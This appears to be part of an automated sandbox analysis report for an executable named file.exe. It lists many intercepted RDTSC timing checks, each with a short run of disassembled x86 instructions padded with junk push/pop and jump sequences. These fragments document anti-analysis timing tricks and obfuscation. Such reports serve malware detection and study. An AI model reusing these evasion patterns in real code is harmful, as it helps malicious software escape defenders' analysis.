                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F60A second address: A5F627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F3778D7B2C0h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A606A6 second address: A606B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7C02Eh 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A606B9 second address: A606BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60879 second address: A608FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F3778D7C028h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, 44253B16h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jno 00007F3778D7C02Ch 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov edi, dword ptr [ebp+122D2049h] 0x00000046 mov eax, dword ptr [ebp+122D1071h] 0x0000004c and bl, FFFFFFBCh 0x0000004f push FFFFFFFFh 0x00000051 sbb di, FBD2h 0x00000056 nop 0x00000057 js 00007F3778D7C03Ch 0x0000005d jmp 00007F3778D7C036h 0x00000062 push eax 0x00000063 jnp 00007F3778D7C030h 0x00000069 push eax 0x0000006a push edx 0x0000006b push ecx 0x0000006c pop ecx 0x0000006d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A624AD second address: A6250E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F3778D7B2B8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 and ebx, 23A0C3F4h 0x0000002d push 00000000h 0x0000002f call 00007F3778D7B2BAh 0x00000034 call 00007F3778D7B2BFh 0x00000039 movzx edi, dx 0x0000003c pop ebx 0x0000003d pop ebx 0x0000003e mov di, B627h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jnp 00007F3778D7B2B6h 0x0000004d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6250E second address: A6251F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6251F second address: A62525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62525 second address: A62529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62529 second address: A6252D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A634FC second address: A63502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6369C second address: A636B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F3778D7B2B8h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD0F second address: A0CD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD15 second address: A0CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD1E second address: A0CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7C02Ah 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD2C second address: A0CD49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F3778D7B2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3778D7B2BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD49 second address: A0CD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD4D second address: A0CD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD51 second address: A0CD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D410 second address: A6D423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3778D7B2BBh 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D423 second address: A6D427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D427 second address: A6D44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F3778D7B2C5h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D44D second address: A6D451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D451 second address: A6D459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D459 second address: A6D45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D45F second address: A6D463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CE7A second address: A6CE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4ECA4 second address: A4ECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A718D6 second address: A718DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A739D2 second address: A739FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F3778D7B2BCh 0x0000000d jno 00007F3778D7B2B6h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F3778D7B2BDh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79016 second address: A7902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3778D7C02Ch 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7902E second address: A79045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7B2C1h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79195 second address: A79199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79199 second address: A7919D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7919D second address: A791A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79454 second address: A79463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F3778D7B2B6h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A795B8 second address: A795D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007F3778D7C038h 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7978A second address: A7979A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jo 00007F3778D7B2B6h 0x0000000c pop ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7979A second address: A797A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A797A6 second address: A797B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A797B0 second address: A797C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A797C5 second address: A797CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A797CA second address: A797D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F687 second address: A7F69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E1DB second address: A7E1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E4EA second address: A7E4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E4FC second address: A7E502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E502 second address: A7E506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E506 second address: A7E50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E997 second address: A7E99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7EDC7 second address: A7EDCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83D50 second address: A83D61 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 jbe 00007F3778D7B2B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A849A9 second address: A849BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A849BD second address: A849DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F3778D7B2C6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F3778D7B2BEh 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A849DD second address: A849EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7C02Eh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A849EF second address: A849F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84CFA second address: A84D1E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3778D7C026h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3778D7C034h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89B70 second address: A89B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525AC second address: A525B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525B2 second address: A525B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52806 second address: A52845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jnl 00007F3778D7C02Eh 0x0000000e xchg eax, esi 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3778D7C028h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edx, ecx 0x0000002b push eax 0x0000002c push edi 0x0000002d push ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52AC0 second address: A52ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F3778D7B2B6h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52ACD second address: A52AEC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D3433h] 0x0000000e push 00000004h 0x00000010 push esi 0x00000011 sub dword ptr [ebp+122D24FCh], edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop eax 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52E5F second address: A52E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52E63 second address: A52E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F3778D7C02Ch 0x0000000c je 00007F3778D7C026h 0x00000012 popad 0x00000013 push eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F3778D7C026h 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5303F second address: A5304E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7B2BBh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5304E second address: A53052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A532BC second address: A532F5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D335Ch], esi 0x00000014 lea eax, dword ptr [ebp+12485D15h] 0x0000001a movzx edi, bx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 jmp 00007F3778D7B2C7h 0x00000026 pop ecx 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A532F5 second address: A31892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc ecx, 631EA448h 0x00000012 push eax 0x00000013 push edi 0x00000014 jno 00007F3778D7C026h 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c call dword ptr [ebp+122D2111h] 0x00000022 pushad 0x00000023 push edx 0x00000024 jg 00007F3778D7C026h 0x0000002a ja 00007F3778D7C026h 0x00000030 pop edx 0x00000031 pushad 0x00000032 jmp 00007F3778D7C02Fh 0x00000037 jno 00007F3778D7C026h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88BB6 second address: A88BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7B2C6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89011 second address: A89015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89015 second address: A89033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F3778D7B2B6h 0x00000013 jnl 00007F3778D7B2B6h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89033 second address: A8904C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3778D7C026h 0x00000008 jmp 00007F3778D7C02Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8904C second address: A89071 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3778D7B2C9h 0x00000008 jmp 00007F3778D7B2C3h 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F3778D7B2B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89071 second address: A89075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89075 second address: A89079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8968C second address: A89698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3778D7C026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89698 second address: A896B5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3778D7B2C7h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D599 second address: A8D59D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D59D second address: A8D5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A908E2 second address: A908FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A908FB second address: A9091B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3778D7B2D2h 0x00000008 jmp 00007F3778D7B2C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9091B second address: A90927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90927 second address: A90933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F3778D7B2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93929 second address: A93930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E833 second address: A0E854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2BDh 0x00000009 popad 0x0000000a jmp 00007F3778D7B2BFh 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E854 second address: A0E889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3778D7C037h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A935C7 second address: A935FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007F3778D7B2BFh 0x0000000b jmp 00007F3778D7B2BBh 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3778D7B2BEh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A935FC second address: A93600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97F87 second address: A97FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2BEh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3778D7B2C7h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97886 second address: A9788B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97B80 second address: A97B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97B84 second address: A97B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F3778D7C026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97B94 second address: A97B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97B9A second address: A97BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3778D7C033h 0x0000000c jbe 00007F3778D7C026h 0x00000012 rdtsc
